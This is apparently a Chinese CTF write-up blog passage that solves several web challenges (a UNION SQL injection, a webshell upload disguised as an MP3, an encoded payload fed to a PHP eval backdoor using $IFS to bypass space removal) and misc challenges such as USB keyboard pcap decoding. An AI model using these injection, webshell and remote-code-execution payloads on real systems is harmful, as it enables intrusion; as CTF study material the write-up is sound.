<p><img src="D:\huchuhao\Typora\images\image-20260102192907231.png" alt="image-20260102192907231"></p>
<p>这里得到3个表，flag大概率在sys_config(豆包说的)，继续往下查</p>
<p>sys_config表中的列有</p>
<p><code>id</code>：主键（自增）</p>
<p>- <code>config_key</code>：配置项名称（唯一）</p>
<p>- &#96;id：主键（自增）</p>
<ul>
<li>config_key：配置项名称（唯一）</li>
<li>config_value：配置项值（TEXT 类型）</li>
</ul>
<p>这里查config_value</p>
<p>-1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select config_value from sys_config)e</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102193222829.png" alt="image-20260102193222829"></p>
<h3 id="搞点哦润吉吃吃🍊"><a href="#搞点哦润吉吃吃🍊" class="headerlink" title="搞点哦润吉吃吃🍊"></a><strong>搞点哦润吉吃吃🍊</strong></h3><p>前端登入页面源码给了登入用户和密码</p>
<blockquote>
<!-- 唔...这个密码有点难记，但是我已经记好了 Doro/Doro_nJlPVs_@123 --></blockquote>
<p>登入进入</p>
<p>抓包获得信息</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102195644722.png" alt="image-20260102195644722"></p>
<p>然后写脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">def auto_challenge():</span><br><span class="line">    base_url = &quot;url&quot;   </span><br><span class="line">    </span><br><span class="line">    headers = &#123;</span><br><span class="line">        &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36&quot;,</span><br><span class="line">        &quot;Content-Type&quot;: &quot;application/json&quot;,</span><br><span class="line">        &quot;Cookie&quot;: &quot;token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJOYW1lIjoiVHJ1ZSIsImxldmVsIjo0fQ.GDy5KyvNcRbDteUjPwoPvI8KbIR9FNHsdpckUJOgu28; session=.eJxNy0EKwyAQQNG7zNpFTRNlXPceIs1ghYmGyQiFkLs33bn-_53w_iRmqpni1lnLzoUEAiLODzPEQ5No1LIRBOudfy6zdX48vu12dkJnHU4GuOVMaywVgkonA_0gqenv4dWkwfUDUdspYw.aVevNw.OHVrR2Vg6tWXY_IdLHjIUon4ruw&quot;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    session = requests.Session()</span><br><span class="line">    session.headers.update(headers)</span><br><span class="line">    </span><br><span class="line">    try:</span><br><span class="line">        # 1. 启动挑战</span><br><span class="line">        start_response = session.post(f&quot;&#123;base_url&#125;/start_challenge&quot;)</span><br><span class="line">        if start_response.status_code != 200:</span><br><span class="line">            print(f&quot;[-] 请求失败: &#123;start_response.status_code&#125;&quot;)</span><br><span class="line">            return</span><br><span class="line">        </span><br><span class="line">        # 2. 获取新的session cookie</span><br><span class="line">        new_session_cookie = None</span><br><span class="line">        if &#x27;Set-Cookie&#x27; in start_response.headers:</span><br><span class="line">            set_cookie = start_response.headers[&#x27;Set-Cookie&#x27;]</span><br><span class="line">            if &#x27;session=&#x27; in set_cookie:</span><br><span class="line">                new_session_cookie = set_cookie.split(&#x27;session=&#x27;)[1].split(&#x27;;&#x27;)[0]</span><br><span class="line">                session.cookies.set(&#x27;session&#x27;, new_session_cookie)</span><br><span class="line">        </span><br><span class="line">        start_data = start_response.json()</span><br><span class="line">        if &quot;error&quot; in start_data:</span><br><span class="line">            print(f&quot;[-] 错误: &#123;start_data[&#x27;error&#x27;]&#125;&quot;)</span><br><span class="line">            return</span><br><span class="line">        </span><br><span class="line">        # 3. 获取表达式并计算token</span><br><span class="line">        expression = start_data.get(&quot;expression&quot;, &quot;&quot;)</span><br><span class="line">        if not expression or &quot;token =&quot; not in expression:</span><br><span class="line">            print(&quot;[-] 没有找到有效的 token 表达式&quot;)</span><br><span class="line">            return</span><br><span class="line">        </span><br><span class="line">        calc_expr = expression.split(&quot;token =&quot;)[1].strip()</span><br><span class="line">        </span><br><span class="line">        # 使用 eval 来计算表达式</span><br><span class="line">        try:</span><br><span class="line">            token = eval(calc_expr)  # 计算表达式</span><br><span class="line">        except Exception as e:</span><br><span class="line">            print(f&quot;[-] 计算 token 出错: &#123;e&#125;&quot;)</span><br><span class="line">            return</span><br><span class="line">        </span><br><span class="line">        # 4. 提交验证</span><br><span class="line">        submit_data = &#123;&quot;token&quot;: int(token)&#125;</span><br><span class="line">        submit_headers = &#123;&quot;Cookie&quot;: f&quot;session=&#123;new_session_cookie&#125;&quot;&#125; if new_session_cookie else headers</span><br><span class="line">        </span><br><span class="line">        submit_response = session.post(f&quot;&#123;base_url&#125;/verify_token&quot;, json=submit_data, headers=submit_headers)</span><br><span class="line">        </span><br><span class="line">        # 输出验证结果</span><br><span class="line">        print(submit_response.text)</span><br><span class="line">        </span><br><span class="line">    except Exception as e:</span><br><span class="line">        print(f&quot;错误: &#123;e&#125;&quot;)</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    auto_challenge()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>代码逻辑</p>
<p><strong>启动挑战</strong>：通过发送一个 POST 请求到 <code>/start_challenge</code>，启动挑战。</p>
<p><strong>获取新的 session cookie</strong>：从响应中提取新的 <code>session</code> cookie（如果有），并更新请求的 session。</p>
<p><strong>计算 Token</strong>：从服务器响应中提取挑战的表达式，计算出 token。</p>
<p><strong>提交验证</strong>：将计算出的 token 提交到服务器进行验证，并打印响应结果</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102204337030.png" alt="image-20260102204337030"></p>
<h3 id="白帽小-K-的故事（1）"><a href="#白帽小-K-的故事（1）" class="headerlink" title="白帽小 K 的故事（1）"></a><strong>白帽小 K 的故事（1）</strong></h3><p>根据提示看接口， <code>/v1/list</code> 接口，发现已有文件，<code>/v1/onload</code> 读取文件，&#x2F;v1&#x2F;upload可以上传文件，先读取文件看看</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102211208122.png" alt="image-20260102211208122"></p>
<p>服务器将 MP3 文件（<code>star.mp3</code>）当作 PHP 脚本解析执行，那这就是突破口。我们可以写入恶意文件进去，当php脚本解析执行获得webshell，先上🐎</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102211447439.png" alt="image-20260102211447439"></p>
<p>虽然上传成功了，但是列表没有c.php，那还上传mp3文件，</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102212101719.png" alt="image-20260102212101719"></p>
<p><img src="D:\huchuhao\Typora\images\image-20260102212111433.png" alt="image-20260102212111433"></p>
<p>可以看到脚本被执行了，在根目录有flag</p>
<p>在传一个执行cat &#x2F;flag就行了</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102212258466.png" alt="image-20260102212258466"></p>
<h3 id="真的是签到诶"><a href="#真的是签到诶" class="headerlink" title="真的是签到诶"></a><strong>真的是签到诶</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">$cipher = $_POST[&#x27;cipher&#x27;] ?? &#x27;&#x27;;</span><br><span class="line"></span><br><span class="line">function atbash($text) &#123;</span><br><span class="line">  $result = &#x27;&#x27;;</span><br><span class="line">  foreach (str_split($text) as $char) &#123;</span><br><span class="line">    if (ctype_alpha($char)) &#123;</span><br><span class="line">      $is_upper = ctype_upper($char);</span><br><span class="line">      $base = $is_upper ? ord(&#x27;A&#x27;) : ord(&#x27;a&#x27;);</span><br><span class="line">      $offset = ord(strtolower($char)) - ord(&#x27;a&#x27;);</span><br><span class="line">      $new_char = chr($base + (25 - $offset));</span><br><span class="line">      $result .= $new_char;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      $result .= $char;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  return $result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if ($cipher) &#123;</span><br><span class="line">  $cipher = base64_decode($cipher);</span><br><span class="line">  $encoded = atbash($cipher);</span><br><span class="line">  $encoded = str_replace(&#x27; &#x27;, &#x27;&#x27;, $encoded);</span><br><span class="line">  $encoded = str_rot13($encoded);</span><br><span class="line">  @eval($encoded);</span><br><span class="line">  exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$question = &quot;真的是签到吗？&quot;;</span><br><span class="line">$answer = &quot;真的很签到诶！&quot;;</span><br><span class="line"></span><br><span class="line">$res =  $question . &quot;&lt;br&gt;&quot; . $answer . &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $res . $res . $res . $res . $res;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>代码post传参经过 Base64 → Atbash → 去空格 → ROT13 的代码，服务器最终会执行 <em>(eval)</em> 解码后的内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line"></span><br><span class="line">def atbash(text):</span><br><span class="line">    &quot;&quot;&quot;Atbash 解密：字母反转&quot;&quot;&quot;</span><br><span class="line">    result = &#x27;&#x27;</span><br><span class="line">    for char in text:</span><br><span class="line">        if char.isalpha():</span><br><span class="line">            base = &#x27;A&#x27; if char.isupper() else &#x27;a&#x27;</span><br><span class="line">            offset = ord(char.lower()) - ord(&#x27;a&#x27;)</span><br><span class="line">            new_char = chr(ord(base) + (25 - offset))</span><br><span class="line">            result += new_char</span><br><span class="line">        else:</span><br><span class="line">            result += char</span><br><span class="line">    return result</span><br><span class="line"></span><br><span class="line">def rot13(text):</span><br><span class="line">    &quot;&quot;&quot;ROT13 解密：字母移位13位&quot;&quot;&quot;</span><br><span class="line">    result = []</span><br><span class="line">    for char in text:</span><br><span class="line">        if char.isalpha():</span><br><span class="line">            shift = 13 if char.islower() else -13</span><br><span class="line">            result.append(chr(((ord(char) - ord(&#x27;a&#x27;) + shift) % 26) + ord(&#x27;a&#x27;)) if char.islower() else</span><br><span class="line">                          chr(((ord(char) - ord(&#x27;A&#x27;) + shift) % 26) + ord(&#x27;A&#x27;)))</span><br><span class="line">        else:</span><br><span class="line">            result.append(char)</span><br><span class="line">    return &#x27;&#x27;.join(result)</span><br><span class="line"></span><br><span class="line">def process_payload(payload):</span><br><span class="line">    &quot;&quot;&quot;按顺序解密并执行&quot;&quot;&quot;</span><br><span class="line">    # 1. 进行 Base64 解码</span><br><span class="line">    decoded = base64.b64decode(payload).decode(&#x27;utf-8&#x27;)</span><br><span class="line">    print(f&quot;Base64 解码后: &#123;decoded&#125;&quot;)</span><br><span class="line">    </span><br><span class="line">    # 2. 进行 Atbash 解密</span><br><span class="line">    atbash_decrypted = atbash(decoded)</span><br><span class="line">    print(f&quot;Atbash 解密后: &#123;atbash_decrypted&#125;&quot;)</span><br><span class="line">    </span><br><span class="line">    # 3. 去空格</span><br><span class="line">    atbash_decrypted_no_spaces = atbash_decrypted.replace(&#x27; &#x27;, &#x27;&#x27;)</span><br><span class="line">    print(f&quot;去空格后: &#123;atbash_decrypted_no_spaces&#125;&quot;)</span><br><span class="line">    </span><br><span class="line">    # 4. 进行 ROT13 解密</span><br><span class="line">    rot13_decrypted = rot13(atbash_decrypted_no_spaces)</span><br><span class="line">    print(f&quot;ROT13 解密后: &#123;rot13_decrypted&#125;&quot;)</span><br><span class="line">    </span><br><span class="line">    return rot13_decrypted</span><br><span class="line"></span><br><span class="line"># --- 生成 Payload ---</span><br><span class="line">code = &quot;system(&#x27;ls%20/&#x27;);&quot;  # PHP 代码</span><br><span class="line"></span><br><span class="line"># 生成 payload - 按顺序加密</span><br><span class="line">rot13_encoded = rot13(code)  # ROT13 加密</span><br><span class="line">atbash_encoded = atbash(rot13_encoded)  # Atbash 加密</span><br><span class="line">payload = base64.b64encode(atbash_encoded.encode(&#x27;utf-8&#x27;)).decode(&#x27;utf-8&#x27;)  # Base64 编码</span><br><span class="line"></span><br><span class="line">print(f&quot;原始代码: &#123;code&#125;&quot;)</span><br><span class="line">print(f&quot;ROT13 加密: &#123;rot13_encoded&#125;&quot;)</span><br><span class="line">print(f&quot;Atbash 加密: &#123;atbash_encoded&#125;&quot;)</span><br><span class="line">print(f&quot;最终 Payload: &#123;payload&#125;&quot;)</span><br><span class="line">print(f&quot;POST 数据: cipher=&#123;payload&#125;&quot;)</span><br><span class="line"></span><br><span class="line"># --- 验证过程 ---</span><br><span class="line">print(&quot;\n=== 验证过程 ===&quot;)</span><br><span class="line">decoded = base64.b64decode(payload).decode(&#x27;utf-8&#x27;)</span><br><span class="line">print(f&quot;Base64 解码: &#123;decoded&#125;&quot;)</span><br><span class="line"></span><br><span class="line">atbash_decrypted = atbash(decoded)</span><br><span class="line">print(f&quot;Atbash 解密: &#123;atbash_decrypted&#125;&quot;)</span><br><span class="line"></span><br><span class="line">no_spaces = atbash_decrypted.replace(&#x27; &#x27;, &#x27;&#x27;)</span><br><span class="line">print(f&quot;去除空格: &#123;no_spaces&#125;&quot;)</span><br><span class="line"></span><br><span class="line">rot13_decrypted = rot13(no_spaces)</span><br><span class="line">print(f&quot;ROT13 解密: &#123;rot13_decrypted&#125;&quot;)</span><br><span class="line"></span><br><span class="line">print(&quot;最终执行: &quot;, rot13_decrypted)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里注意用$IFS替换空格，因为代码在解密中会移除空格最后执行的是system(‘cat&#x2F;flag’);最后payload</p>
<p>system(‘cat$IFS&#x2F;flag’);</p>
<p>cipher&#x3D;dW91dGlhKCdrbXQkRUhVL2hibWcnKTs&#x3D;</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102214929391.png" alt="image-20260102214929391"></p>
<h2 id="misc-1"><a href="#misc-1" class="headerlink" title="misc"></a>misc</h2><h3 id="Misc-城邦：NewKeyboard"><a href="#Misc-城邦：NewKeyboard" class="headerlink" title="Misc 城邦：NewKeyboard"></a><strong>Misc 城邦：NewKeyboard</strong></h3><p>参考文章：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/19240">https://xz.aliyun.com/news/19240</a></p>
<p>这个当时也没写出来，赛后看大佬wp才知道第一个流量包的名字要用来做某种映射的</p>
<p>先提取数据然后根据是否按下shift建立普通映射和shift映射两个字典。然后将提取到的按键bit转换为对应的字符，按照前面的文件名做映射即可得到flag</p>
<p>大佬脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br></pre></td><td class="code"><pre><span class="line">import subprocess</span><br><span class="line">from pathlib import Path</span><br><span class="line">from typing import Dict, List, Set, Tuple</span><br><span class="line"></span><br><span class="line">REFERENCE_PCAP = Path(&quot;abcdefghijklmnopqrstuvwxyz1234567890-_!&#123;&#125;.pcapng&quot;)</span><br><span class="line">TARGET_PCAP = Path(&quot;newkeyboard.pcapng&quot;)</span><br><span class="line">REFERENCE_CHARS = &quot;abcdefghijklmnopqrstuvwxyz1234567890-_!&#123;&#125;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def extract_reports(pcap_path: Path) -&gt; List[Set[int]]:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    调用 tshark 抽取 usbhid.data 字段并转换成按键 bit 集合序列。</span><br><span class="line"></span><br><span class="line">    Args:</span><br><span class="line">        pcap_path: pcap文件路径</span><br><span class="line"></span><br><span class="line">    Returns:</span><br><span class="line">        包含每个报告中按键bit集合的列表</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    cmd = [</span><br><span class="line">        &quot;tshark&quot;,</span><br><span class="line">        &quot;-r&quot;, str(pcap_path),</span><br><span class="line">        &quot;-Y&quot;, &quot;usbhid.data&quot;,</span><br><span class="line">        &quot;-T&quot;, &quot;fields&quot;,</span><br><span class="line">        &quot;-e&quot;, &quot;usbhid.data&quot;,</span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    try:</span><br><span class="line">        output = subprocess.check_output(cmd, text=True, stderr=subprocess.DEVNULL)</span><br><span class="line">    except subprocess.CalledProcessError as e:</span><br><span class="line">        raise RuntimeError(f&quot;tshark命令执行失败: &#123;e&#125;&quot;)</span><br><span class="line"></span><br><span class="line">    reports = []</span><br><span class="line">    for line in output.splitlines():</span><br><span class="line">        line = line.strip()</span><br><span class="line">        if not line:</span><br><span class="line">            continue</span><br><span class="line"></span><br><span class="line">        try:</span><br><span class="line">            payload = bytes.fromhex(line)[1:]  # 跳过报告 ID</span><br><span class="line">            bits = set()</span><br><span class="line">            for byte_index, value in enumerate(payload):</span><br><span class="line">                for bit in range(8):</span><br><span class="line">                    if value &amp; (1 &lt;&lt; bit):</span><br><span class="line">                        bits.add(byte_index * 8 + bit)</span><br><span class="line">            reports.append(bits)</span><br><span class="line">        except ValueError as e:</span><br><span class="line">            print(f&quot;警告: 无法解析行 &#x27;&#123;line&#125;&#x27;: &#123;e&#125;&quot;)</span><br><span class="line">            continue</span><br><span class="line"></span><br><span class="line">    return reports</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def build_mapping(reference_reports: List[Set[int]], charset: str) -&gt; Tuple[Dict[int, str], Dict[int, str]]:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    根据参考流量生成未按/按下 Shift 的键位映射。</span><br><span class="line"></span><br><span class="line">    Args:</span><br><span class="line">        reference_reports: 参考报告数据</span><br><span class="line">        charset: 字符集</span><br><span class="line"></span><br><span class="line">    Returns:</span><br><span class="line">        包含未按Shift和按下Shift的键位映射的元组</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    unshift_map, shift_map = &#123;&#125;, &#123;&#125;</span><br><span class="line">    prev = set()</span><br><span class="line">    idx = 0</span><br><span class="line"></span><br><span class="line">    for bits in reference_reports:</span><br><span class="line">        pressed = bits - prev</span><br><span class="line">        # 过滤掉修饰键(bit1代表左Shift)</span><br><span class="line">        non_modifier_keys = [b for b in pressed if b != 1]</span><br><span class="line"></span><br><span class="line">        if non_modifier_keys and idx &lt; len(charset):</span><br><span class="line">            key = non_modifier_keys[0]</span><br><span class="line">            char = charset[idx]</span><br><span class="line">            idx += 1</span><br><span class="line"></span><br><span class="line">            if 1 in bits:  # 检查是否按下了Shift键</span><br><span class="line">                shift_map[key] = char</span><br><span class="line">            else:</span><br><span class="line">                unshift_map[key] = char</span><br><span class="line"></span><br><span class="line">        prev = bits</span><br><span class="line"></span><br><span class="line">    return unshift_map, shift_map</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def decode_reports(</span><br><span class="line">        target_reports: List[Set[int]],</span><br><span class="line">        unshift_map: Dict[int, str],</span><br><span class="line">        shift_map: Dict[int, str]</span><br><span class="line">) -&gt; str:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    使用映射表还原目标流量中的按键序列。</span><br><span class="line"></span><br><span class="line">    Args:</span><br><span class="line">        target_reports: 目标报告数据</span><br><span class="line">        unshift_map: 未按Shift的键位映射</span><br><span class="line">        shift_map: 按下Shift的键位映射</span><br><span class="line"></span><br><span class="line">    Returns:</span><br><span class="line">        解码后的字符串</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    prev = set()</span><br><span class="line">    chars = []</span><br><span class="line"></span><br><span class="line">    for bits in target_reports:</span><br><span class="line">        pressed = bits - prev</span><br><span class="line">        # 过滤掉修饰键</span><br><span class="line">        non_modifier_keys = [b for b in pressed if b != 1]</span><br><span class="line"></span><br><span class="line">        if non_modifier_keys:</span><br><span class="line">            key = non_modifier_keys[0]</span><br><span class="line"></span><br><span class="line">            if 1 in bits:  # 检查是否按下了Shift键</span><br><span class="line">                chars.append(shift_map.get(key, f&quot;&lt;UNK_SHIFT_&#123;key&#125;&gt;&quot;))</span><br><span class="line">            else:</span><br><span class="line">                chars.append(unshift_map.get(key, f&quot;&lt;UNK_&#123;key&#125;&gt;&quot;))</span><br><span class="line"></span><br><span class="line">        prev = bits</span><br><span class="line"></span><br><span class="line">    return &quot;&quot;.join(chars)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main() -&gt; None:</span><br><span class="line">    &quot;&quot;&quot;主函数，执行解码流程&quot;&quot;&quot;</span><br><span class="line">    try:</span><br><span class="line">        print(&quot;正在提取参考报告数据...&quot;)</span><br><span class="line">        ref_reports = extract_reports(REFERENCE_PCAP)</span><br><span class="line"></span><br><span class="line">        print(&quot;正在构建键位映射...&quot;)</span><br><span class="line">        unshift_map, shift_map = build_mapping(ref_reports, REFERENCE_CHARS)</span><br><span class="line"></span><br><span class="line">        print(&quot;正在提取目标报告数据...&quot;)</span><br><span class="line">        target_reports = extract_reports(TARGET_PCAP)</span><br><span class="line"></span><br><span class="line">        print(&quot;正在解码按键序列...&quot;)</span><br><span class="line">        text = decode_reports(target_reports, unshift_map, shift_map)</span><br><span class="line"></span><br><span class="line">        print(&quot;\n解码结果:&quot;)</span><br><span class="line">        print(text)</span><br><span class="line"></span><br><span class="line">    except Exception as e:</span><br><span class="line">        print(f&quot;错误: &#123;e&#125;&quot;)</span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<img src="D:\huchuhao\Typora\images\image-20260102215824614.png" alt="image-20260102215824614" style="zoom:67%;" />

<p>flag{th1s_is_newkeyboard_y0u_get_it!}</p>
<h3 id="美妙的音乐"><a href="#美妙的音乐" class="headerlink" title="美妙的音乐"></a><strong>美妙的音乐</strong></h3><p>Audacity打开题目附件即可看到flag，就是有点费眼</p>
<p> <img src="D:\huchuhao\Typora\images\image-20260102220122705.png" alt="image-20260102220122705"></p>
<p>flag{thi5_1S_m1Di_5tEG0}</p>
<h3 id="日志分析：不敬者的闯入"><a href="#日志分析：不敬者的闯入" class="headerlink" title="日志分析：不敬者的闯入"></a><strong>日志分析：不敬者的闯入</strong></h3><p>分析日志发现多次访问&#x2F;admin,</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102220630697.png" alt="image-20260102220630697"></p>
<p>看webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eavl($_POST[&#x27;flag&#123;12c564e1-1cc6-0f12-e7bd-bf2bad38a078&#125;&#x27;])?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="星期四的狂想"><a href="#星期四的狂想" class="headerlink" title="星期四的狂想"></a><strong>星期四的狂想</strong></h3><p>过滤http请求看流量包，在tcp流38发现加密代码</p>
